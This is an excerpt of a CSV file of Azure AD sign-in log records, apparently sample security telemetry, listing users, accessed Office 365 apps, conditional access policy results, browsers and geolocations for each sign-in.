+1219,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,22:34.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,16000,None,Other,0,68cc469f-b08c-0000-54b3-3f96967b505e,Microsoft.aadiam,Microsoft.aadiam,,9dadd76f-3237-4e1d-84e7-e45c59867492,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,[],notApplied,08/04/2020 16:22,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",37105d23-9607-4aeb-a84b-5fa3358d1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],"{'errorCode': 16000, 'failureReason': 'Other'}",9dadd76f-3237-4e1d-84e7-e45c59867492,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,37105d23-9607-4aeb-a84b-5fa3358d1400,SigninLogs,Failed,41.90428925,-85.99833679
+1220,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:27.7,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,a4118d43-8339-4d8d-897e-e04bb022ae68,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Microsoft Office Web Apps Service,67e3df25-268a-4324-a550-0de1c7f97287,Browser,"[{'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}]",notApplied,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c6df9c5c-6712-4175-a3db-58ce75881400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,c6df9c5c-6712-4175-a3db-58ce75881400,SigninLogs,Sucess,33.7984581,-84.38828278
+1221,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,23:29.1,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,21947cad-62a8-4d17-bc75-3efb6cf88da6,Microsoft.aadiam,Microsoft.aadiam,,Caroline Lee,4,US,Office365 Shell WCSS-Client,89bee1f7-5e6e-4d8a-9f3d-ecd601259da7,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '73b07c2f-ef9f-4b21-9e02-c0b1013c09c4'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",notApplied,08/04/2020 16:23,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",c58f2de3-9305-4921-96ef-ebf03e391400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -84.3882827758789, 'latitude': 33.798458099365234}, 'state': 'Georgia', 'city': 'Atlanta'}",none,none,none,none,[],{'errorCode': 0},Caroline Lee,ee9ea8b3-5b09-4c36-8739-24856720b373,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office365 Shell WCSS-Server,c58f2de3-9305-4921-96ef-ebf03e391400,SigninLogs,Sucess,33.7984581,-84.38828278
+1222,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,47:14.5,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,dafb37eb-a054-4dff-b568-1d3edb51b582,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,SharePoint Online Web Client Extensibility,08e18876-6177-487e-b8b5-cf950c1e598c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:47,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",89223cb6-60af-4a3e-b2e1-9470078a1400,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,89223cb6-60af-4a3e-b2e1-9470078a1400,SigninLogs,Sucess,41.90428925,-85.99833679
+1223,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:03.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",2dc92ee6-03c4-4d81-9c6d-29ffb0b21500,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,2dc92ee6-03c4-4d81-9c6d-29ffb0b21500,SigninLogs,Sucess,33.0175209,35.44601059
+1224,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:25.6,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,00ce469f-c08f-0000-5421-7048ac87a62d,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 SharePoint Online,00000003-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 3, 'displayName': 'Test Policy', 'result': 'success', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}]",success,08/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",cbc0f99c-7bef-40f5-9b26-c77d606d1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 SharePoint Online,cbc0f99c-7bef-40f5-9b26-c77d606d1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1225,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,37:03.3,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,2e6fd17c-1227-433e-b3a3-80a74374a7dc,Microsoft.aadiam,Microsoft.aadiam,,Ofer Shezaf,4,IL,Azure Portal,c44b4083-3bb0-49c1-b47d-974e53cbdf3c,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 17:37,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Chrome 80.0.3987'}",ec85dd07-c5e8-494c-aa5b-3f842d7a1600,,,"{'countryOrRegion': 'IL', 'geoCoordinates': {'longitude': 35.44601058959961, 'latitude': 33.017520904541016}, 'state': 'Hazafon', 'city': 'Jish'}",none,none,none,none,[],{'errorCode': 0},Ofer Shezaf,9c459db5-0407-43fe-a2ea-126757297beb,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Service Management API,ec85dd07-c5e8-494c-aa5b-3f842d7a1600,SigninLogs,Sucess,33.0175209,35.44601059
+1226,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:20.4,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,832ae38e-2940-4bea-93f6-bb25f6131b3f,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Microsoft App Access Panel,0000000c-0000-0000-c000-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",3109113e-8f92-47c2-a124-2483cf5f1500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Windows Azure Active Directory,3109113e-8f92-47c2-a124-2483cf5f1500,SigninLogs,Sucess,41.90428925,-85.99833679
+1227,ab86c959-1ba3-495c-a00d-ced30d8825d3,Azure AD,50:36.9,/tenants/4b2462a4-bbee-495a-a0e1-f23ae524cc9c/providers/Microsoft.aadiam,Sign-in activity,1,SignInLogs,0,None,,0,62aa951f-9da7-4241-a2b2-3b2037c7ffd7,Microsoft.aadiam,Microsoft.aadiam,,Brandon,4,US,Office 365 Exchange Online,00000002-0000-0ff1-ce00-000000000000,Browser,"[{'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'MeganB MCAS Proxy', 'result': 'notApplied', 'id': '8872f6fb-da88-4b63-bcc7-17247669596b'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Megan MFA demo', 'result': 'notEnabled', 'id': '235bec94-f744-48ac-8314-5675953d2def'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 0, 'displayName': 'MeganB MCAS Step-up', 'result': 'notApplied', 'id': '83a057fb-dbca-4ba8-bb5f-0ce6d6e7cff5'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Form MCAS', 'result': 'notApplied', 'id': 'bcd93f74-64fd-4042-a3ae-ee6d48886d6d'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'GBB demo', 'result': 'notApplied', 'id': 'b2915792-0396-4abe-94ec-e17fa17243c5'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 0, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Azure MFA', 'result': 'notEnabled', 'id': '5fd0c4ff-1cd7-4bf6-8607-294a04f58f12'}, {'enforcedSessionControls': [], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': ['Mfa'], 'conditionsSatisfied': 1, 'displayName': 'Semolen - Admin MFA', 'result': 'notApplied', 'id': '4c5a5ea0-5d9f-4730-baaa-7a69cf29ef26'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'On-Prem SharePoint - MeganB proxy', 'result': 'notApplied', 'id': '2e76d011-eaa3-40b4-8ce8-7fba52bf3af8'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 2, 'enforcedGrantControls': [], 'conditionsSatisfied': 1, 'displayName': 'Block Access JulianI', 'result': 'notApplied', 'id': 'ba36f0a4-6d73-4ba4-9282-3b3c14575e36'}, {'enforcedSessionControls': ['CloudAppSecurity'], 'conditionsNotSatisfied': 1, 'enforcedGrantControls': [], 'conditionsSatisfied': 0, 'displayName': 'Test Policy', 'result': 'notApplied', 'id': '69c7a12f-b407-45a3-b07e-fa04fc7f273d'}]",notApplied,08/04/2020 16:50,"{'operatingSystem': 'Windows 10', 'deviceId': '', 'browser': 'Edge 83.0.478'}",d3a3c86e-d6a1-4323-9bc0-1a26e0351500,,,"{'countryOrRegion': 'US', 'geoCoordinates': {'longitude': -85.99833679199219, 'latitude': 41.90428924560547}, 'state': 'Michigan', 'city': 'Cassopolis'}",none,none,none,none,[],{'errorCode': 0},Brandon,9dadd76f-3237-4e1d-84e7-e45c59867492,,4b2462a4-bbee-495a-a0e1-f23ae524cc9c,Office 365 Exchange Online,d3a3c86e-d6a1-4323-9bc0-1a26e0351500,SigninLogs,Sucess,41.90428925,-85.99833679
